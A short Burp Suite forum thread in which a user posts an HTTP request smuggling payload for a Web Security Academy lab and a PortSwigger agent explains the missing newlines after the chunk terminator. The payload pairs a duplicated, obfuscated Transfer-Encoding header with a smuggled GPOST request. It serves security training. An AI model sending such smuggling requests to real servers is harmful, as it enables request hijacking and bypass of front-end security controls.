Burp Suite User Forum

Create new post

HTTP request smuggling, obfuscating the TE header

Sondip | Last updated: Mar 05, 2021 07:22AM UTC

POST / HTTP/1.1 Host: my host.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0\r\n\r\n Response=> HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff Connection: close Content-Length: 38 {"error":"Read timeout after 10000ms"}

Uthman, PortSwigger Agent | Last updated: Mar 05, 2021 09:54AM UTC

You need to include two newlines (press Enter/Return on your keyboard twice) after the '0'. Have you done this?

Sondip | Last updated: Mar 05, 2021 03:13PM UTC

can you show me.

Sondip | Last updated: Mar 05, 2021 03:32PM UTC

Tnx man.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.